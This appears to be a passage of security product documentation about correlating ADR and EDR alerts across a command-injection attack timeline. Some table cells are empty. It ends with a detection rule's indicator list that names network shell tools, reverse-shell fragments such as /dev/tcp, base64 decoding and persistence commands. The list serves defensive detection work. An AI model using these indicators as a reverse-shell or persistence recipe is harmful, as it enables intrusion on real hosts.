Attack timeline
Phase | What ADR sees | What EDR sees | Combined picture |
Exploit | Command injection in | Nothing yet — the attack is inside the application runtime | ADR provides the trigger and root cause |
Execution | ADR detects the application spawning an unexpected process | EDR detects: | ADR explains why the process spawned. EDR shows what it did. |
Persistence | ADR may detect outbound connections to unexpected destinations | EDR detects: downloaded file in /tmp/, cron job modification, reverse shell connection, base64 decoding | Full chain: |
Containment | ADR: Enable Block Mode for command injection on the affected app | EDR: Kill the malicious process, quarantine the host if needed | Surgical response at both layers |
Correlation logic: ADR exploit event joined with EDR detection on the same target hostname within a 30-minute window. The rule also matches suspicious process patterns.
Suspicious indicators matched by the detection rule: - Post-exploitation tools: curl , wget , nc , ncat , netcat - Reverse shells: bash -i , sh -c , /dev/tcp - Obfuscation: base64 -d - Persistence: chmod , crontab , nohup , setsid - Suspicious paths: /tmp/ , /dev/shm/ , /var/tmp/